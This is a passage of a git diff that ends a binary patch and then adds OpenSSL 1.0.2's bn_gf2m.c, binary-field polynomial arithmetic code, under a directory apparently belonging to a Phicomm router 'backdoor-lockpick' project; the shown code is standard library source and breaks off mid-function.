zl=RCWoZ91NdmqxWt!$*ip)b$m_Ab$~&JpI&7i#8N4QH@s!~r|T#>OmEoX2OmSe$LO
zVcc?i+){f=CEd)$(HLRH{*o1iA?PegE)bH|YH+UUfYh-Qg~#C?27k;6nIBIu=cAk4
zoTzyN*2Hyz&s60HCxlD2)Nyafyz<0mwN2fuK6#99$i|3yL*0P;@h7zfHsiTZ4sfUK
z_SeEbX=aPx+ofe)U#;ad<R1#=Mw+T!#`KYfYL}9Jt%5N=SJYk>yd&mGfxyAz)lg}R
zuW4q;@1s36;|;OtIb%jRI2I1RUswr~M6+G~+BKQ?jVdk~F^|LQ^b1;cx8Hpf!;s_P
zh;VNd<IM73#LR=NlD>`+12N<U7uiazj`yHL%{TD~Nj>9b#^R_6iiG!f-liQ2`873l
z8n!#+uPgi;eUWu$*H>$YbpMv9SpZ?M6??ZpG^H-zgj#pDaVETavyEPO4P--pJ$1=Z
zc_wOJPo0_yNasdma>h%AjbK3}J5|kYs9uAS`5xL?gNyT_QccY^*;*fmDynUPH|pI4
zdfT{OE!*O+voyEanw7L=Y73kjQ0N0o#oEy!7x<oj42z}o6ws*oSp?2awhfFhd(o0!
zJbJK$>Wz!3XWUH5tl<%v*DKZ3UbjP^U);rgt6^MT180cET`KN@m1(IJ4r3FDf_J}}
z+5^9}ws`3@+yU_{Le<)`HA?u);-k1O*fQ{OsXLQ90!Ffk5<U)+#XG~nT=0$8djTEI
z!p|R^@WbcFO#uhhg5GH5sFHbh3S)&G@WXpa%$5bJ6@k#pS1d%!!aC$HMJ$9O7eV1V
z2sC4smWSvD6BtZi_?HWV1#G~6ANDIHact^u-x9;Z3p|D`|A-j=CD#TqEW%TCd=EP8
zB!}+R7jTc!lm*7X<kf|4RKb%Xw*#`_U(r5qYRJv@Re|Xb!_JNso`*xnxt3*^06#=C
zy?n?wn47VE?_jc2(n)Z3I5-l*6C?K0h~h}MI(CvPor7Bq;bWaTFyhaJOE8Md*xJuq
zBDmE=E?+o;+A|}V@2*eCcRwK$i=%3&FsGV=oWS-~N6im~Ct=Qa3%xKPl6CoUHUF@q
zib|X=thQ!@9W3+D+~O)eJ>>4vMCS_&K$u${H7}3btfZ$P7axn_BAm!wW{Q%&jK0N#
zLNqFwS0I5G^1REM1{|uIdG2y`WnM{FVFI&FAbn#w?9DvH)7x%{LGx34XO;92-$fmv
zFkLxt0z#8#3*1sT;1^2bk#TWI3u3>NbP#x1PE^dFfs&(ufse~o0^s>T$vk4EG}vD)
zHR@0@zXef#{*}xZe0~TC?zxg(={NcM{&u6y|FC8jG3V4o%`W(X+;3$c9&(v;=%~+e
zei%?TziImb7KPp|`i{b8lu2yk5|~_3!m_-eLcrrz*6`#DndYomRAC8rrA8}^yRGD<
z+Oa%t_3faMFXTeuK1<kT%(sNAx$x`gCE@?#TV)Ew@%;;kV45^9YS}uz9mSv9kpn5a
z^f4+9Lu@}hX3R$=kQ6UNfRE=|C4CUoKzeo<+u{4fb8b8Tpgn<S0+Q}Bdz^L0f};<L
z;2Q(s$>+4Ji7H`W#YTQa?0zu960uXSri3AzfqYr=O~CY%B;U$WV>;KvClOf}kN;4Y
zcE5|?E%Yh8Q+w|C0Z<Y(N5wTojU8jnjg6~(wXGdSLN|OX1NR5&?hSt3;LYIP<#mC&
z2fk)u7|I~MG5nN6mS@dtTN!vihYTYDOSSc4j$P}RW60~6KXaP<yRe7#!0)vCo`*JT
z@_2_UG*8VTXV~LA=n8pi_fJthb*ZT#Prb9p;i&_ndVCF@ng)-z!Q+M@8a!Lz!SV|P
zpyN9gVNcDlv%%v#<O+Lg52B9!Q&rE3)U;+#&f$F4?O74>)Ty3Y5TVMrmRo<&G#C5l
z*sVRdM(n+{I7_Q9?{ji*l{0KP+0<Jh=hGw{7kg`Q@?9wB)1f(=*vWkjY!*EH3RW)8
z?w0TeB>YhcZ<g@265cA|TO@qDgd4zdy<(j_E`X&a@_2)p%nv`5@E0Zgu!R3g!ha*-
zznAbgCH!3p|3Jd8O85;4$H1S=Khq)fC*yM@e4&K1jznx*XIG$;HLS%7i#10dYfz)H
z$C{efhg)JTYC|*}!_LN*O|e0}J*kVvwm7eL_7Cht)Y&(HuR)^&U&+Dlo~?QitG&F6
zHB=E#bYZoxzbn?0*bz?-#<7`*KaH=!xE_1DKglHwTVWyrve?<xvxAQ`dhylX)y2Z=
z*2M-4Jr++U`;!P0MqjL>M<2v`&mdM&CAJKdhqq-HC$^=QdEC-Iqqj8u)?_@+Vz}bY
zr(&JmPsO&j_rRTdG3*Bx%&{}z`4T>YSe7D$f_x@Cf<K55%0#}=!kkw@UC3{f@C@M|
zBL4>A3gM%KW1I;6GwhU!_E0^G38(T8O86$iF_#Jb3Bu{R_7Fas$e$&g`tvg3)Sp)+
zd{n}x;B^GbME}p0@Vg{@sf6PlQs~ETt?<JZ!fz*hyM!BrQ@;&M_^X7^A^LB#Km54f
zI|%P1yoT^^6OR9sCG3BR@OgxPMmUYPxi}#dd{KL938(97CY;(iK=^#nCF~g{oW{uu
zgwr_rsf52G;lGpc;}ZV1grAe}8F)d1g55Mu{Djju2}t-#!l^&kN%(HUsh_`3INh(4
zgya2C`2PdK7ZC2UuTHownm3jazL3akgx^K@lY~?KLxfZPKO&s!f0b~$t~}v%-b;j2
zJx=@ThwGwzF5y06e}Hi6x0MpUTEbf;ypQljWZrKPPS^Wm!s$7Ejc|Id^Mq49=Lo0q
zInTZVqkpKLHo~d=UI~AJaBAnT38(q$4B^xd6_sEJ6tstak7f~0&&xf8FNQH9&g%)M
z`LK;}YUeQF)Nd~mPUrn2;q*LSC7k9x7ybbO1=sZzc!ZrZ38&xFMTGl_ybtPF@Uvlm
zI(WN_|BiEUZ)btQoqc+H2fX#9_3jq6WW2XMpvQ-F7U*i%+gYGvaF7K$`}_Lh31EqS
zJsyC+MepTzC%e5ZVFU(}{R8o&zLN#GhIn^uYqGsBZd>sGy?ihnuK@OOE-9<GYpZO(
zhz|R@Aesz)jy|q05vx*zNe9XiJMK^oj<uT%V-w2~c#zwlM?}2rnlP{66X#zB9jNnv
z9Up|TsIv|pTEzVKPzZG~zj&`AjEcVeU)sMK24Sk8v4wgL+v9!MAVv63pbn^@EfdF|
zvd145g7$mj_|3p4+rKmR1_{5QIvgv;i~XByZk%cWFB?#X?2W-D9@UBCkxkq?K<o-$
dvZ3539BnmA{<oVvXH7Pq+5f-TD+DFu{{v(xugw4e

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gf2m.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gf2m.c
new file mode 100644
index 0000000..aeee49a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gf2m.c
@@ -0,0 +1,1293 @@
+/* crypto/bn/bn_gf2m.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * In addition, Sun covenants to all licensees who provide a reciprocal
+ * covenant with respect to their own patents if any, not to sue under
+ * current and future patent claims necessarily infringed by the making,
+ * using, practicing, selling, offering for sale and/or otherwise
+ * disposing of the ECC Code as delivered hereunder (or portions thereof),
+ * provided that such covenant shall not apply:
+ *  1) for code that a licensee deletes from the ECC Code;
+ *  2) separates from the ECC Code; or
+ *  3) for infringements caused by:
+ *       i) the modification of the ECC Code or
+ *      ii) the combination of the ECC Code with other software or
+ *          devices where such combination causes the infringement.
+ *
+ * The software is originally written by Sheueling Chang Shantz and
+ * Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+/*
+ * NOTE: This file is licensed pursuant to the OpenSSL license below and may
+ * be modified; but after modifications, the above covenant may no longer
+ * apply! In such cases, the corresponding paragraph ["In addition, Sun
+ * covenants ... causes the infringement."] and this note can be edited out;
+ * but please keep the Sun copyright notice and attribution.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <assert.h>
+#include <limits.h>
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#ifndef OPENSSL_NO_EC2M
+
+/*
+ * Maximum number of iterations before BN_GF2m_mod_solve_quad_arr should
+ * fail.
+ */
+# define MAX_ITERATIONS 50
+
+static const BN_ULONG SQR_tb[16] = { 0, 1, 4, 5, 16, 17, 20, 21,
+    64, 65, 68, 69, 80, 81, 84, 85
+};
+
+/* Platform-specific macros to accelerate squaring. */
+# if defined(SIXTY_FOUR_BIT) || defined(SIXTY_FOUR_BIT_LONG)
+#  define SQR1(w) \
+    SQR_tb[(w) >> 60 & 0xF] << 56 | SQR_tb[(w) >> 56 & 0xF] << 48 | \
+    SQR_tb[(w) >> 52 & 0xF] << 40 | SQR_tb[(w) >> 48 & 0xF] << 32 | \
+    SQR_tb[(w) >> 44 & 0xF] << 24 | SQR_tb[(w) >> 40 & 0xF] << 16 | \
+    SQR_tb[(w) >> 36 & 0xF] <<  8 | SQR_tb[(w) >> 32 & 0xF]
+#  define SQR0(w) \
+    SQR_tb[(w) >> 28 & 0xF] << 56 | SQR_tb[(w) >> 24 & 0xF] << 48 | \
+    SQR_tb[(w) >> 20 & 0xF] << 40 | SQR_tb[(w) >> 16 & 0xF] << 32 | \
+    SQR_tb[(w) >> 12 & 0xF] << 24 | SQR_tb[(w) >>  8 & 0xF] << 16 | \
+    SQR_tb[(w) >>  4 & 0xF] <<  8 | SQR_tb[(w)       & 0xF]
+# endif
+# ifdef THIRTY_TWO_BIT
+#  define SQR1(w) \
+    SQR_tb[(w) >> 28 & 0xF] << 24 | SQR_tb[(w) >> 24 & 0xF] << 16 | \
+    SQR_tb[(w) >> 20 & 0xF] <<  8 | SQR_tb[(w) >> 16 & 0xF]
+#  define SQR0(w) \
+    SQR_tb[(w) >> 12 & 0xF] << 24 | SQR_tb[(w) >>  8 & 0xF] << 16 | \
+    SQR_tb[(w) >>  4 & 0xF] <<  8 | SQR_tb[(w)       & 0xF]
+# endif
+
+# if !defined(OPENSSL_BN_ASM_GF2m)
+/*
+ * Product of two polynomials a, b each with degree < BN_BITS2 - 1, result is
+ * a polynomial r with degree < 2 * BN_BITS - 1 The caller MUST ensure that
+ * the variables have the right amount of space allocated.
+ */
+#  ifdef THIRTY_TWO_BIT
+static void bn_GF2m_mul_1x1(BN_ULONG *r1, BN_ULONG *r0, const BN_ULONG a,
+                            const BN_ULONG b)
+{
+    register BN_ULONG h, l, s;
+    BN_ULONG tab[8], top2b = a >> 30;
+    register BN_ULONG a1, a2, a4;
+
+    a1 = a & (0x3FFFFFFF);
+    a2 = a1 << 1;
+    a4 = a2 << 1;
+
+    tab[0] = 0;
+    tab[1] = a1;
+    tab[2] = a2;
+    tab[3] = a1 ^ a2;
+    tab[4] = a4;
+    tab[5] = a1 ^ a4;
+    tab[6] = a2 ^ a4;
+    tab[7] = a1 ^ a2 ^ a4;
+
+    s = tab[b & 0x7];
+    l = s;
+    s = tab[b >> 3 & 0x7];
+    l ^= s << 3;
+    h = s >> 29;
+    s = tab[b >> 6 & 0x7];
+    l ^= s << 6;
+    h ^= s >> 26;
+    s = tab[b >> 9 & 0x7];
+    l ^= s << 9;
+    h ^= s >> 23;
+    s = tab[b >> 12 & 0x7];
+    l ^= s << 12;
+    h ^= s >> 20;
+    s = tab[b >> 15 & 0x7];
+    l ^= s << 15;
+    h ^= s >> 17;
+    s = tab[b >> 18 & 0x7];
+    l ^= s << 18;
+    h ^= s >> 14;
+    s = tab[b >> 21 & 0x7];
+    l ^= s << 21;
+    h ^= s >> 11;
+    s = tab[b >> 24 & 0x7];
+    l ^= s << 24;
+    h ^= s >> 8;
+    s = tab[b >> 27 & 0x7];
+    l ^= s << 27;
+    h ^= s >> 5;
+    s = tab[b >> 30];
+    l ^= s << 30;
+    h ^= s >> 2;
+
+    /* compensate for the top two bits of a */
+
+    if (top2b & 01) {
+        l ^= b << 30;
+        h ^= b >> 2;
+    }
+    if (top2b & 02) {
+        l ^= b << 31;
+        h ^= b >> 1;
+    }
+
+    *r1 = h;
+    *r0 = l;
+}
+#  endif
+#  if defined(SIXTY_FOUR_BIT) || defined(SIXTY_FOUR_BIT_LONG)
+static void bn_GF2m_mul_1x1(BN_ULONG *r1, BN_ULONG *r0, const BN_ULONG a,
+                            const BN_ULONG b)
+{
+    register BN_ULONG h, l, s;
+    BN_ULONG tab[16], top3b = a >> 61;
+    register BN_ULONG a1, a2, a4, a8;
+
+    a1 = a & (0x1FFFFFFFFFFFFFFFULL);
+    a2 = a1 << 1;
+    a4 = a2 << 1;
+    a8 = a4 << 1;
+
+    tab[0] = 0;
+    tab[1] = a1;
+    tab[2] = a2;
+    tab[3] = a1 ^ a2;
+    tab[4] = a4;
+    tab[5] = a1 ^ a4;
+    tab[6] = a2 ^ a4;
+    tab[7] = a1 ^ a2 ^ a4;
+    tab[8] = a8;
+    tab[9] = a1 ^ a8;
+    tab[10] = a2 ^ a8;
+    tab[11] = a1 ^ a2 ^ a8;
+    tab[12] = a4 ^ a8;
+    tab[13] = a1 ^ a4 ^ a8;
+    tab[14] = a2 ^ a4 ^ a8;
+    tab[15] = a1 ^ a2 ^ a4 ^ a8;
+
+    s = tab[b & 0xF];
+    l = s;
+    s = tab[b >> 4 & 0xF];
+    l ^= s << 4;
+    h = s >> 60;
+    s = tab[b >> 8 & 0xF];
+    l ^= s << 8;
+    h ^= s >> 56;
+    s = tab[b >> 12 & 0xF];
+    l ^= s << 12;
+    h ^= s >> 52;
+    s = tab[b >> 16 & 0xF];
+    l ^= s << 16;
+    h ^= s >> 48;
+    s = tab[b >> 20 & 0xF];
+    l ^= s << 20;
+    h ^= s >> 44;
+    s = tab[b >> 24 & 0xF];
+    l ^= s << 24;
+    h ^= s >> 40;
+    s = tab[b >> 28 & 0xF];
+    l ^= s << 28;
+    h ^= s >> 36;
+    s = tab[b >> 32 & 0xF];
+    l ^= s << 32;
+    h ^= s >> 32;
+    s = tab[b >> 36 & 0xF];
+    l ^= s << 36;
+    h ^= s >> 28;
+    s = tab[b >> 40 & 0xF];
+    l ^= s << 40;
+    h ^= s >> 24;
+    s = tab[b >> 44 & 0xF];
+    l ^= s << 44;
+    h ^= s >> 20;
+    s = tab[b >> 48 & 0xF];
+    l ^= s << 48;
+    h ^= s >> 16;
+    s = tab[b >> 52 & 0xF];
+    l ^= s << 52;
+    h ^= s >> 12;
+    s = tab[b >> 56 & 0xF];
+    l ^= s << 56;
+    h ^= s >> 8;
+    s = tab[b >> 60];
+    l ^= s << 60;
+    h ^= s >> 4;
+
+    /* compensate for the top three bits of a */
+
+    if (top3b & 01) {
+        l ^= b << 61;
+        h ^= b >> 3;
+    }
+    if (top3b & 02) {
+        l ^= b << 62;
+        h ^= b >> 2;
+    }
+    if (top3b & 04) {
+        l ^= b << 63;
+        h ^= b >> 1;
+    }
+
+    *r1 = h;
+    *r0 = l;
+}
+#  endif
+
+/*
+ * Product of two polynomials a, b each with degree < 2 * BN_BITS2 - 1,
+ * result is a polynomial r with degree < 4 * BN_BITS2 - 1 The caller MUST
+ * ensure that the variables have the right amount of space allocated.
+ */
+static void bn_GF2m_mul_2x2(BN_ULONG *r, const BN_ULONG a1, const BN_ULONG a0,
+                            const BN_ULONG b1, const BN_ULONG b0)
+{
+    BN_ULONG m1, m0;
+    /* r[3] = h1, r[2] = h0; r[1] = l1; r[0] = l0 */
+    bn_GF2m_mul_1x1(r + 3, r + 2, a1, b1);
+    bn_GF2m_mul_1x1(r + 1, r, a0, b0);
+    bn_GF2m_mul_1x1(&m1, &m0, a0 ^ a1, b0 ^ b1);
+    /* Correction on m1 ^= l1 ^ h1; m0 ^= l0 ^ h0; */
+    r[2] ^= m1 ^ r[1] ^ r[3];   /* h0 ^= m1 ^ l1 ^ h1; */
+    r[1] = r[3] ^ r[2] ^ r[0] ^ m1 ^ m0; /* l1 ^= l0 ^ h0 ^ m0; */
+}
+# else
+void bn_GF2m_mul_2x2(BN_ULONG *r, BN_ULONG a1, BN_ULONG a0, BN_ULONG b1,
+                     BN_ULONG b0);
+# endif
+
+/*
+ * Add polynomials a and b and store result in r; r could be a or b, a and b
+ * could be equal; r is the bitwise XOR of a and b.
+ */
+int BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b)
+{
+    int i;
+    const BIGNUM *at, *bt;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    if (a->top < b->top) {
+        at = b;
+        bt = a;
+    } else {
+        at = a;
+        bt = b;
+    }
+
+    if (bn_wexpand(r, at->top) == NULL)
+        return 0;
+
+    for (i = 0; i < bt->top; i++) {
+        r->d[i] = at->d[i] ^ bt->d[i];
+    }
+    for (; i < at->top; i++) {
+        r->d[i] = at->d[i];
+    }
+
+    r->top = at->top;
+    bn_correct_top(r);
+
+    return 1;
+}
+
+/*-
+ * Some functions allow for representation of the irreducible polynomials
+ * as an int[], say p.  The irreducible f(t) is then of the form:
+ *     t^p[0] + t^p[1] + ... + t^p[k]
+ * where m = p[0] > p[1] > ... > p[k] = 0.
+ */
+
+/* Performs modular reduction of a and store result in r.  r could be a. */
+int BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[])
+{
+    int j, k;
+    int n, dN, d0, d1;
+    BN_ULONG zz, *z;
+
+    bn_check_top(a);
+
+    if (!p[0]) {
+        /* reduction mod 1 => return 0 */
+        BN_zero(r);
+        return 1;
+    }
+
+    /*
+     * Since the algorithm does reduction in the r value, if a != r, copy the
+     * contents of a into r so we can do reduction in r.
+     */
+    if (a != r) {
+        if (!bn_wexpand(r, a->top))
+            return 0;
+        for (j = 0; j < a->top; j++) {
+            r->d[j] = a->d[j];
+        }
+        r->top = a->top;
+    }
+    z = r->d;
+
+    /* start reduction */
+    dN = p[0] / BN_BITS2;
+    for (j = r->top - 1; j > dN;) {
+        zz = z[j];
+        if (z[j] == 0) {
+            j--;
+            continue;
+        }
+        z[j] = 0;
+
+        for (k = 1; p[k] != 0; k++) {
+            /* reducing component t^p[k] */
+            n = p[0] - p[k];
+            d0 = n % BN_BITS2;
+            d1 = BN_BITS2 - d0;
+            n /= BN_BITS2;
+            z[j - n] ^= (zz >> d0);
+            if (d0)
+                z[j - n - 1] ^= (zz << d1);
+        }
+
+        /* reducing component t^0 */
+        n = dN;
+        d0 = p[0] % BN_BITS2;
+        d1 = BN_BITS2 - d0;
+        z[j - n] ^= (zz >> d0);
+        if (d0)
+            z[j - n - 1] ^= (zz << d1);
+    }
+
+    /* final round of reduction */
+    while (j == dN) {
+
+        d0 = p[0] % BN_BITS2;
+        zz = z[dN] >> d0;
+        if (zz == 0)
+            break;
+        d1 = BN_BITS2 - d0;
+
+        /* clear up the top d1 bits */
+        if (d0)
+            z[dN] = (z[dN] << d1) >> d1;
+        else
+            z[dN] = 0;
+        z[0] ^= zz;             /* reduction t^0 component */
+
+        for (k = 1; p[k] != 0; k++) {
+            BN_ULONG tmp_ulong;
+
+            /* reducing component t^p[k] */
+            n = p[k] / BN_BITS2;
+            d0 = p[k] % BN_BITS2;
+            d1 = BN_BITS2 - d0;
+            z[n] ^= (zz << d0);
+            tmp_ulong = zz >> d1;
+            if (d0 && tmp_ulong)
+                z[n + 1] ^= tmp_ulong;
+        }
+
+    }
+
+    bn_correct_top(r);
+    return 1;
+}
+
+/*
+ * Performs modular reduction of a by p and store result in r.  r could be a.
+ * This function calls down to the BN_GF2m_mod_arr implementation; this wrapper
+ * function is only provided for convenience; for best performance, use the
+ * BN_GF2m_mod_arr function.
+ */
+int BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p)
+{
+    int ret = 0;
+    int arr[6];
+    bn_check_top(a);
+    bn_check_top(p);
+    ret = BN_GF2m_poly2arr(p, arr, sizeof(arr) / sizeof(arr[0]));
+    if (!ret || ret > (int)(sizeof(arr) / sizeof(arr[0]))) {
+        BNerr(BN_F_BN_GF2M_MOD, BN_R_INVALID_LENGTH);
+        return 0;
+    }
+    ret = BN_GF2m_mod_arr(r, a, arr);
+    bn_check_top(r);
+    return ret;
+}
+
+/*
+ * Compute the product of two polynomials a and b, reduce modulo p, and store
+ * the result in r.  r could be a or b; a could be b.
+ */
+int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                        const int p[], BN_CTX *ctx)
+{
+    int zlen, i, j, k, ret = 0;
+    BIGNUM *s;
+    BN_ULONG x1, x0, y1, y0, zz[4];
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    if (a == b) {
+        return BN_GF2m_mod_sqr_arr(r, a, p, ctx);
+    }
+
+    BN_CTX_start(ctx);
+    if ((s = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    zlen = a->top + b->top + 4;
+    if (!bn_wexpand(s, zlen))
+        goto err;
+    s->top = zlen;
+
+    for (i = 0; i < zlen; i++)
+        s->d[i] = 0;
+
+    for (j = 0; j < b->top; j += 2) {
+        y0 = b->d[j];
+        y1 = ((j + 1) == b->top) ? 0 : b->d[j + 1];
+        for (i = 0; i < a->top; i += 2) {
+            x0 = a->d[i];
+            x1 = ((i + 1) == a->top) ? 0 : a->d[i + 1];
+            bn_GF2m_mul_2x2(zz, x1, x0, y1, y0);
+            for (k = 0; k < 4; k++)
+                s->d[i + j + k] ^= zz[k];
+        }
+    }
+
+    bn_correct_top(s);
+    if (BN_GF2m_mod_arr(r, s, p))
+        ret = 1;
+    bn_check_top(r);
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Compute the product of two polynomials a and b, reduce modulo p, and store
+ * the result in r.  r could be a or b; a could equal b. This function calls
+ * down to the BN_GF2m_mod_mul_arr implementation; this wrapper function is
+ * only provided for convenience; for best performance, use the
+ * BN_GF2m_mod_mul_arr function.
+ */
+int BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                    const BIGNUM *p, BN_CTX *ctx)
+{
+    int ret = 0;
+    const int max = BN_num_bits(p) + 1;
+    int *arr = NULL;
+    bn_check_top(a);
+    bn_check_top(b);
+    bn_check_top(p);
+    if ((arr = (int *)OPENSSL_malloc(sizeof(int) * max)) == NULL)
+        goto err;
+    ret = BN_GF2m_poly2arr(p, arr, max);
+    if (!ret || ret > max) {
+        BNerr(BN_F_BN_GF2M_MOD_MUL, BN_R_INVALID_LENGTH);
+        goto err;
+    }
+    ret = BN_GF2m_mod_mul_arr(r, a, b, arr, ctx);
+    bn_check_top(r);
+ err:
+    if (arr)
+        OPENSSL_free(arr);
+    return ret;
+}
+
+/* Square a, reduce the result mod p, and store it in a.  r could be a. */
+int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[],
+                        BN_CTX *ctx)
+{
+    int i, ret = 0;
+    BIGNUM *s;
+
+    bn_check_top(a);
+    BN_CTX_start(ctx);
+    if ((s = BN_CTX_get(ctx)) == NULL)
+        return 0;
+    if (!bn_wexpand(s, 2 * a->top))
+        goto err;
+
+    for (i = a->top - 1; i >= 0; i--) {
+        s->d[2 * i + 1] = SQR1(a->d[i]);
+        s->d[2 * i] = SQR0(a->d[i]);
+    }
+
+    s->top = 2 * a->top;
+    bn_correct_top(s);
+    if (!BN_GF2m_mod_arr(r, s, p))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Square a, reduce the result mod p, and store it in a.  r could be a. This
+ * function calls down to the BN_GF2m_mod_sqr_arr implementation; this
+ * wrapper function is only provided for convenience; for best performance,
+ * use the BN_GF2m_mod_sqr_arr function.
+ */
+int BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)
+{
+    int ret = 0;
+    const int max = BN_num_bits(p) + 1;
+    int *arr = NULL;
+
+    bn_check_top(a);
+    bn_check_top(p);
+    if ((arr = (int *)OPENSSL_malloc(sizeof(int) * max)) == NULL)
+        goto err;
+    ret = BN_GF2m_poly2arr(p, arr, max);
+    if (!ret || ret > max) {
+        BNerr(BN_F_BN_GF2M_MOD_SQR, BN_R_INVALID_LENGTH);
+        goto err;
+    }
+    ret = BN_GF2m_mod_sqr_arr(r, a, arr, ctx);
+    bn_check_top(r);
+ err:
+    if (arr)
+        OPENSSL_free(arr);
+    return ret;
+}
+
+/*
+ * Invert a, reduce modulo p, and store the result in r. r could be a. Uses
+ * Modified Almost Inverse Algorithm (Algorithm 10) from Hankerson, D.,
+ * Hernandez, J.L., and Menezes, A.  "Software Implementation of Elliptic
+ * Curve Cryptography Over Binary Fields".
+ */
+int BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)
+{
+    BIGNUM *b, *c = NULL, *u = NULL, *v = NULL, *tmp;
+    int ret = 0;
+
+    bn_check_top(a);
+    bn_check_top(p);
+
+    BN_CTX_start(ctx);
+
+    if ((b = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if ((c = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if ((u = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if ((v = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod(u, a, p))
+        goto err;
+    if (BN_is_zero(u))
+        goto err;
+
+    if (!BN_copy(v, p))
+        goto err;
+# if 0
+    if (!BN_one(b))
+        goto err;
+
+    while (1) {
+        while (!BN_is_odd(u)) {
+            if (BN_is_zero(u))
+                goto err;
+            if (!BN_rshift1(u, u))
+                goto err;
+            if (BN_is_odd(b)) {
+                if (!BN_GF2m_add(b, b, p))
+                    goto err;
+            }
+            if (!BN_rshift1(b, b))
+                goto err;
+        }
+
+        if (BN_abs_is_word(u, 1))
+            break;
+
+        if (BN_num_bits(u) < BN_num_bits(v)) {
+            tmp = u;
+            u = v;
+            v = tmp;
+            tmp = b;
+            b = c;
+            c = tmp;
+        }
+
+        if (!BN_GF2m_add(u, u, v))
+            goto err;
+        if (!BN_GF2m_add(b, b, c))
+            goto err;
+    }
+# else
+    {
+        int i, ubits = BN_num_bits(u), vbits = BN_num_bits(v), /* v is copy
+                                                                * of p */
+            top = p->top;
+        BN_ULONG *udp, *bdp, *vdp, *cdp;
+
+        bn_wexpand(u, top);
+        udp = u->d;
+        for (i = u->top; i < top; i++)
+            udp[i] = 0;
+        u->top = top;
+        bn_wexpand(b, top);
+        bdp = b->d;
+        bdp[0] = 1;
+        for (i = 1; i < top; i++)
+            bdp[i] = 0;
+        b->top = top;
+        bn_wexpand(c, top);
+        cdp = c->d;
+        for (i = 0; i < top; i++)
+            cdp[i] = 0;
+        c->top = top;
+        vdp = v->d;             /* It pays off to "cache" *->d pointers,
+                                 * because it allows optimizer to be more
+                                 * aggressive. But we don't have to "cache"
+                                 * p->d, because *p is declared 'const'... */
+        while (1) {
+            while (ubits && !(udp[0] & 1)) {
+                BN_ULONG u0, u1, b0, b1, mask;
+
+                u0 = udp[0];
+                b0 = bdp[0];
+                mask = (BN_ULONG)0 - (b0 & 1);
+                b0 ^= p->d[0] & mask;
